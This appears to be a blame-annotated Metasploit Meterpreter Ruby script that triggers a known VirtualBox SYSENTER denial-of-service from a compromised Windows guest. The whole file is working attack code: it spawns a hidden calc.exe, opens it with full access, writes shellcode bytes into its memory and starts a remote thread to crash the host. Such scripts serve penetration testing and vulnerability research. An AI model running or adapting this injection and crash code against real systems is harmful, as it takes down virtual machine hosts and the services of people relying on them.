2009-10-26 15:14:28 +00:00
|
|
|
# $Id$
|
2009-08-02 16:42:54 +00:00
|
|
|
|
|
|
|
# Meterpreter script for triggering the VirtualBox DoS published at:
|
|
|
|
# http://milw0rm.com/exploits/9323
|
|
|
|
|
2009-11-05 00:40:19 +00:00
|
|
|
opts = Rex::Parser::Arguments.new(
|
|
|
|
"-h" => [ false,"Help menu." ]
|
|
|
|
)
|
|
|
|
|
|
|
|
opts.parse(args) { |opt, idx, val|
|
|
|
|
case opt
|
|
|
|
when "-h"
|
|
|
|
print_line("virtualbox_sysenter_dos -- trigger the VirtualBox DoS published at http://milw0rm.com/exploits/9323")
|
|
|
|
print_line("USAGE: run virtualbox_sysenter_dos")
|
|
|
|
print_status(opts.usage)
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
|
|
|
}
|
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
#check for proper Meterpreter Platform
|
|
|
|
def unsupported
|
|
|
|
print_error("This version of Meterpreter is not supported with this Script!")
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
2011-01-16 05:23:57 +00:00
|
|
|
unsupported if client.platform !~ /win32|win64/i
|
2009-11-05 00:40:19 +00:00
|
|
|
|
2009-08-02 16:42:54 +00:00
|
|
|
# Spawn calculator
|
|
|
|
pid = client.sys.process.execute("calc.exe", nil, {'Hidden' => 'true'}).pid
|
|
|
|
print_status("Calculator PID is #{pid}")
|
|
|
|
|
|
|
|
calc = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
|
|
|
|
|
|
|
|
# Allocate some memory
|
|
|
|
mem = calc.memory.allocate(32)
|
|
|
|
|
|
|
|
print_status("Allocated memory at address #{"0x%.8x" % mem}")
|
|
|
|
|
|
|
|
# Write the trigger shellcode
|
|
|
|
# sysenter
|
|
|
|
# ret
|
|
|
|
calc.memory.write(mem, "\x0f\x34\xc3")
|
|
|
|
|
|
|
|
print_status("VirtualBox SYSENTER Denial of Service launching...")
|
|
|
|
|
|
|
|
# Create a new thread on the shellcode pointer
|
|
|
|
calc.thread.create(mem, 0)
|
|
|
|
|
|
|
|
print_status("VirtualBox SYSENTER Denial of Service delivered.")
|
|
|
|
|